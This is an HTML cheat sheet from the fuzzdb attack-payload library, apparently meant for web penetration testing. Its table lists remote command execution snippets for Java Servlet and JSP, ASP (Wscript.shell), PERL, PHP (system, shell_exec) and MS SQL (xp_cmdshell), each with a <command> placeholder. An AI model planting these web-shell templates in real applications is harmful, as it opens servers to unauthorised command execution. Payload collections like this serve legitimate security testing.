fuzzdb/attack-payloads/rfi/rfi-cheatsheet.html
2010-04-17 21:32:31 +00:00

178 lines
7.6 KiB
HTML

<html>
<head>
<title>Web Hacking. cd hack. cs hack. hacked godzilla. </title>
<META http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="robots" CONTENT="index all, follow">
</head>
<div class=Section1>
<p class=doctext><span lang=EN-GB>This table provides a handy list of
techniques that can be used for remote command execution, by language.</span></p>
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
style='width:100.0%'>
<tr>
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
<h5 align=center style='text-align:center'><a name=app03table01></a><span
lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table: Remote
Command Execution Cheat Sheet</span></h5>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Web Application Environment</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Source Code</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Additional Information</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>Java Servlet </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><span lang=EN-GB>class Example</span></pre><pre><span
lang=EN-GB> extends HTTPServlet</span></pre><pre><span lang=EN-GB>{</span></pre><pre><span
lang=EN-GB> .</span></pre><pre><span lang=EN-GB> .</span></pre><pre><span
lang=EN-GB> .</span></pre><pre><span lang=EN-GB> void function()</span></pre><pre><span
lang=EN-GB> {</span></pre><pre><span lang=EN-GB>Runtime r = Runtime.getRuntime();</span></pre><pre><span
lang=EN-GB>Process p = r.exec(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;,</span></pre><pre><span
class=docemphasis1>&lt;arguments&gt;</span>);</pre><pre>}</pre><pre> .</pre><pre> .</pre><pre> .</pre><pre>}</pre></td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'><a
href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
</span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>Java Server Pages (JSP) </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre>&lt;%</pre><pre> Runtime r =</pre><pre>Runtime.getRuntime();</pre><pre> Process p =</pre><pre>r.exec(&quot;<span
class=docemphasis1>&lt;command&gt;</span>&quot;,</pre><pre><span
class=docemphasis1>&lt;arguments&gt;</span>);</pre><pre>%&gt;</pre></td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'><a
href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
</span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>Active Server Pages (ASP) </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext><span lang=EN-GB>If Windows Scripting Host</span></p>
<p class=doctext><span lang=EN-GB>is installed on the target</span></p>
<p class=doctext><span lang=EN-GB>system:</span></p>
<pre><span lang=EN-GB>&lt;%</span></pre><pre><span lang=EN-GB> Set wsh =</span></pre><pre><span
lang=EN-GB>Server.CreateObject(&quot;Wscript.shell&quot;)</span></pre><pre><span
lang=EN-GB> </span>wsh.run(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;);</pre><pre>%&gt;</pre></td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'><a
href="zhttp://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp"
target="_blank"><span style='color:#003399'>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp</span></a>
</span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>PERL </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext><span lang=EN-GB>In PERL, commands are executed by wrapping
them with the backtick symbol (`)</span></p>
<p class=doctext><span lang=EN-GB>$result = `<span class=docemphasis1>&lt;command&gt;</span>`;</span></p>
<p class=doctext><span lang=EN-GB>or</span></p>
<p class=doctext><span lang=EN-GB>system(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;);</span></p>
<p class=doctext>or</p>
<p class=doctext>open(IN, &quot;<span class=docemphasis1>&lt;command&gt;</span>
|&quot;);</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'><a href="http://www.perldoc.com/perl5.6/pod/perlfunc.html"
target="_blank"><span style='color:#003399'>http://www.perldoc.com/perl5.6/pod/perlfunc.html</span></a>
</span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>PHP </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext><span lang=EN-GB>&lt;? system(&quot;<span
class=docemphasis1>&lt;command&gt;</span>&quot;) ?&gt;</span></p>
<p class=doctext><span lang=EN-GB>or</span></p>
<p class=doctext><span lang=EN-GB>&lt;? shell_exec(&quot;<span
class=docemphasis1>&lt;command&gt;</span>&quot;) ?&gt;</span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'><a href="http://www.php.net/manual/en/function.shell-exec.php"
target="_blank"><span lang=EN-GB style='color:#003399'>http://www.php.net/manual/en/function.shell-exec.php</span></a></span><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>MS SQL </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
color:black'>EXEC master..xp_cmdshell&quot; &lt;command&gt;&quot; </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
color:black'>&nbsp;</span></p>
</td>
</tr>
</table>
</div>
<br>
</body>
</html>